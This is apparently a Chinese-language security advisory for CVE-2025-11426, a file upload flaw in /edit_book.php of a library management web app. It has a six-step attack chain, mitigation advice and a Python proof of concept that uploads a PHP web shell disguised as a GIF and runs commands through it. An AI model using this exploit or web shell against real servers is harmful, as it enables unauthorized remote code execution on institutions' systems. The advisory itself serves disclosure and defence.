CVE-2025-11426：Advanced Library Management System 任意文件上传漏洞

漏洞信息

漏洞编号

CVE-2025-11426

漏洞类型

任意文件上传（Unrestricted Upload）

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

projectworlds Advanced Library Management System

漏洞概述

CVE-2025-11426是projectworlds公司开发的Advanced Library Management System（高级图书管理系统）1.0版本中存在的一个安全漏洞。该漏洞于2025年10月8日被公开披露，CVSS评分为6.3分，属于中危级别漏洞。该漏洞位于系统的/edit_book.php文件中，具体涉及对image参数的处理逻辑存在缺陷，攻击者可以通过操纵该参数实现不受限制的文件上传操作。Advanced Library Management System是一款用于图书馆管理的Web应用程序，允许管理员管理图书信息、读者信息和借阅记录等功能。由于该漏洞可以通过网络远程利用，且仅需要低权限账户即可执行攻击，因此对部署该系统的图书馆和教育机构构成了潜在的安全威胁。该漏洞的利用代码已经被公开发布，可能被恶意攻击者用于实际攻击活动中。受影响的系统管理员应尽快采取相应的修复措施，以防止潜在的安全事件发生。

技术细节

该漏洞的核心问题在于/edit_book.php文件对上传的image参数缺乏充分的验证和过滤。在正常的图书编辑功能中，系统允许管理员上传图书封面图片。然而，由于代码未对上传文件的类型、扩展名和内容进行严格的安全检查，攻击者可以将恶意文件（如Web Shell）伪装成图片文件上传到服务器。攻击者首先需要拥有系统的低权限账户（PR:L），然后通过网络（AV:N）访问/edit_book.php端点。在HTTP请求中，攻击者构造包含恶意脚本代码的文件，并将其作为image参数的值提交。由于服务端未对文件MIME类型、扩展名白名单或文件内容进行验证，恶意文件被成功写入到服务器的Web可访问目录中。上传成功后，攻击者可以通过直接访问上传文件的URL来执行其中的恶意代码，从而获得服务器的进一步控制权限。该漏洞的攻击复杂度低（AC:L），不需要用户交互（UI:N），对机密性、完整性和可用性均产生低级别影响（C:L/I:L/A:L）。

攻击链分析

STEP 1

步骤1：获取初始访问

攻击者通过社会工程学或其他方式获取Advanced Library Management System的低权限账户凭据，或注册一个普通用户账户。

STEP 2

步骤2：登录系统

使用获取的凭据登录系统，获取有效的会话Cookie，为后续请求建立认证上下文。

STEP 3

步骤3：构造恶意上传请求

攻击者构造包含PHP Web Shell代码的恶意文件，将其伪装为图片格式（如添加GIF89a文件头），通过image参数提交到/edit_book.php端点。

STEP 4

步骤4：绕过文件类型验证

由于服务端未对上传文件进行严格的类型和扩展名验证，恶意PHP文件被成功上传并存储到Web可访问目录中。

STEP 5

步骤5：执行远程代码

攻击者通过浏览器或脚本直接访问上传的Web Shell文件，传入系统命令参数，实现对服务器操作系统的远程命令执行。

STEP 6

步骤6：权限提升与持久化

获得命令执行权限后，攻击者可进一步尝试权限提升、安装后门或横向移动，获取对系统的完全控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11426 PoC - Advanced Library Management System 1.0
# Unrestricted File Upload via /edit_book.php image parameter
# Requirements: Valid low-privilege account credentials

import requests

TARGET_URL = "http://target-host"
LOGIN_URL = f"{TARGET_URL}/index.php"
EDIT_URL = f"{TARGET_URL}/edit_book.php"
USERNAME = "attacker_user"
PASSWORD = "attacker_password"

# Step 1: Login to obtain session cookie
session = requests.Session()
login_data = {
    "username": USERNAME,
    "password": PASSWORD,
    "submit": "Login"
}
session.post(LOGIN_URL, data=login_data)

# Step 2: Prepare malicious PHP web shell disguised as image
# The shell will be saved with .php extension to enable code execution
web_shell_content = b"GIF89a;\n<?php system($_GET['cmd']); ?>"
files = {
    "image": ("shell.php", web_shell_content, "image/gif")
}

# Step 3: Upload the malicious file via the vulnerable edit_book.php endpoint
# The 'image' parameter is the injection point
upload_data = {
    "book_name": "Test Book",
    "author": "Test Author",
    # Additional book fields as required by the application
}

response = session.post(EDIT_URL, files=files, data=upload_data)

# Step 4: Access the uploaded web shell to execute commands
# The shell is typically stored in /uploads/ or similar directory
shell_url = f"{TARGET_URL}/uploads/shell.php?cmd=id"
result = requests.get(shell_url)
print(f"Command execution result: {result.text}")

影响范围

projectworlds Advanced Library Management System 1.0

防御指南

临时缓解措施

在官方补丁发布之前，建议管理员采取以下临时缓解措施：首先，限制/edit_book.php端点的访问权限，仅允许可信的管理员IP访问；其次，在Web服务器层面（如Nginx或Apache）配置规则，禁止上传目录执行PHP等脚本文件；此外，部署Web应用防火墙（WAF）规则，检测和阻止包含恶意文件上传的请求；最后，定期检查上传目录中是否存在可疑的.php、.phtml等可执行文件，及时清理发现的恶意文件。同时建议加强账户管理，限制普通用户的上传权限。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11426
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11426
3 Details https://www.cvedetails.com/cve/CVE-2025-11426/
4 VulDB https://vuldb.com/cve/CVE-2025-11426
5 Link https://github.com/ChenGuangHuangHun/CVE/issues/3
6 Link https://vuldb.com/?ctiid.327361
7 Link https://vuldb.com/?id.327361
8 Link https://vuldb.com/?submit.666228